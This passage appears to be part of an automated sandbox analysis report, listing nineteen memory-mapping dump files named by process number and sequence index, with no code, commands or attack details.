                    • memory/2344-109-0x0000000000000000-mapping.dmp

                    • memory/2384-110-0x0000000000000000-mapping.dmp

                    • memory/2396-111-0x0000000000000000-mapping.dmp

                    • memory/2408-112-0x0000000000000000-mapping.dmp

                    • memory/2420-113-0x0000000000000000-mapping.dmp

                    • memory/2440-114-0x0000000000000000-mapping.dmp

                    • memory/2452-115-0x0000000000000000-mapping.dmp

                    • memory/2460-116-0x0000000000000000-mapping.dmp

                    • memory/2468-117-0x0000000000000000-mapping.dmp

                    • memory/2500-118-0x0000000000000000-mapping.dmp

                    • memory/2508-119-0x0000000000000000-mapping.dmp

                    • memory/2516-120-0x0000000000000000-mapping.dmp

                    • memory/2524-121-0x0000000000000000-mapping.dmp

                    • memory/2552-122-0x0000000000000000-mapping.dmp

                    • memory/2576-123-0x0000000000000000-mapping.dmp

                    • memory/2588-124-0x0000000000000000-mapping.dmp

                    • memory/2612-125-0x0000000000000000-mapping.dmp

                    • memory/2644-127-0x0000000000000000-mapping.dmp

                    • memory/2668-126-0x0000000000000000-mapping.dmp